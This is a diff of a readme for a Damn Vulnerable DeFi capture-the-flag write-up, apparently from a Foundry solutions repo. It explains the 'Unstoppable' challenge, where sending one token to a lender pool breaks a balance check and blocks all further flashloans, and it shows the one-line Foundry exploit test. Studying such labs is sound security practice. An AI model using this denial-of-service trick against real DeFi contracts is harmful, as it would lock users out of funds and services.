devnet0x/Blockchain/ChallengesCTF/DVDF_Foundry/readme.md

 Any comments/corrections please reach me at my twitter account: **@devnet0x**

 ## Challenge 1: Unstoppable ##
-We as attacker's must transfer 1 token to lender pool to create a difference between poolBalance and balanceBefore in this line from function flashloan():
+The vulnerability in this challenge is in the flashloan, previous to transfer tokens we have this condition:

         if (poolBalance != balanceBefore) revert AssertionViolated();

+So, we as attacker's must transfer 1 token to lender pool to create a difference between poolBalance and balanceBefore.
 Then, nobody else will be able to borrow a flashloan:

 ```
    function testExploit() public {
         /** EXPLOIT START **/
         vm.startPrank(attacker);
-        // We (attacker) transfer 1 token to lender pool to create a difference
-        // between poolBalance and balanceBefore in this line from function flashloan():
-        //
-        // if (poolBalance != balanceBefore) revert AssertionViolated();
-        //
         dvt.transfer(address(unstoppableLender), 1 ether);
         vm.stopPrank();
         /** EXPLOIT END **/